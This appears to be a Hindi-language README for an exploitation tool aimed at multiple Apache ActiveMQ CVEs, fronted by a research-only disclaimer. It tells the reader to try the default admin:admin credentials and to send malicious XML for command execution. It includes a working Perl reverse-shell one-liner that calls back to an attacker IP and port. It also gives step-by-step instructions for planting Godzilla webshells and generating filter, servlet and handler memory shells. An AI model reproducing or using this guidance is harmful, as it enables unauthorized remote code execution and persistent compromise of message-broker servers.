
Apache ActiveMQ कमजोरियों का व्यापक शोषण उपकरण (CVE-2015-5254, CVE-2016-3088, CVE-2022-41678, CVE-2023-46604, CVE-2024-32114, CVE-2026-34197, CVE-2026-40466, CVE-2026-42588)
Apache ActiveMQ में कमजोरियों का पता लगाने और उनका शोषण करने का समर्थन करता है, CVE-2015-5254, CVE-2016-3088, CVE-2022-41678, CVE-2023-46604, CVE-2024-32114, CVE-2026-34197, CVE-2026-40466, CVE-2026-42588

[!WARNING] यह उपकरण केवल सुरक्षा अनुसंधान और शिक्षण उद्देश्यों के लिए है। उपयोगकर्ता इस उपकरण के उपयोग से उत्पन्न सभी कानूनी और संबंधित जिम्मेदारियों को स्वयं वहन करेगा। कृपया सुनिश्चित करें कि आपका व्यवहार स्थानीय कानूनों और नियमों के अनुरूप है। लेखक कोई जिम्मेदारी नहीं लेता है। यदि आप सहमत नहीं हैं, तो इस उपकरण का उपयोग न करें।
jdk8 पर चलता है, Openwire डिफ़ॉल्ट पोर्ट 61616 है, कभी-कभी लक्ष्य वातावरण खुला नहीं हो सकता है। Apache ActiveMQ का डिफ़ॉल्ट उपयोगकर्ता नाम और पासवर्ड admin:admin है। BeanXML सेटिंग पैनल संबंधित कमांड निष्पादित करने के लिए दुर्भावनापूर्ण XML उत्पन्न कर सकता है। यदि कोई समस्या है, तो कृपया Issue खोलें।
कमजोरी का पता लगाते समय, दुर्भावनापूर्ण XML सर्वर पते को dnslog पर सेट किया जा सकता है। यदि अनुरोध प्राप्त होता है, तो यह संकेत देता है कि CVE-2023-46604, CVE-2026-34197, CVE-2026-40466, CVE-2026-42588 मौजूद हो सकते हैं।
java-chains डिसीरियलाइज़ेशन डेटा उत्पन्न करता है, कमजोरी को सत्यापित करने के लिए URLDNS का उपयोग किया जा सकता है
रिवर्स शेल के लिए perl का उपयोग करना सबसे अच्छा है, sh और bash कभी-कभी काम नहीं करते
/usr/bin/perl -e 'use Socket;$i="192.168.239.129";$p=2333;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

कस्टम वेबशेल लिखते समय, बिंगशी (BingXie) शेल लिखने पर 500 त्रुटि होगी, गॉडज़िला (Godzilla) सामान्य है। उपकरण कनेक्ट करते समय प्रमाणीकरण हेडर जोड़ना सुनिश्चित करें।
संस्करण 1.4 से, मेमोरी शेल जनरेशन मॉड्यूल MemShellParty को एकीकृत नहीं किया गया है। एक तरफ, fatjar पैकेज भारी है, दूसरी तरफ, springbeanxmlclassloader के लिए आवश्यक base64 डिकोडिंग विधि विभिन्न Java संस्करणों में सार्वभौमिक नहीं है, जिससे उपकरण को पहिया का पुन: आविष्कार करना पड़ता है। मेमोरी शेल की आवश्यकता वाले उपयोगकर्ता नीचे दिए गए XML जनरेशन प्रक्रिया का संदर्भ ले सकते हैं:
पहले MemShellParty में संबंधित मेमोरी शेल base64 स्ट्रिंग उत्पन्न करें https://party.mem.mk/ui

फिर java-chains पर जाएं, Generate-OtherPayload ढूंढें, और कस्टम बाइटकोड चुनें

JDK संस्करण के अनुसार base64 डिकोडिंग विधि चुनें, डिफ़ॉल्ट decodeFromString विधि है, जबकि vulhub में CVE-2026-34197 लैब के लिए java.util.Base64 चुनना आवश्यक है
अंत में मेमोरी शेल Base64 स्ट्रिंग दर्ज करें और जनरेट पर क्लिक करें

फ़िल्टर, लिसनर या सर्वलेट प्रकार के लिए, मेमोरी शेल कनेक्शन पते पर पथ /admin/, /api/, और प्रमाणीकरण हेडर जोड़ना आवश्यक है, हैंडलर को पथ और प्रमाणीकरण हेडर फ़ील्ड की आवश्यकता नहीं है
धन्यवाद
https://github.com/URJACK2025/CVE-2022-41678
https://github.com/vulhub/vulhub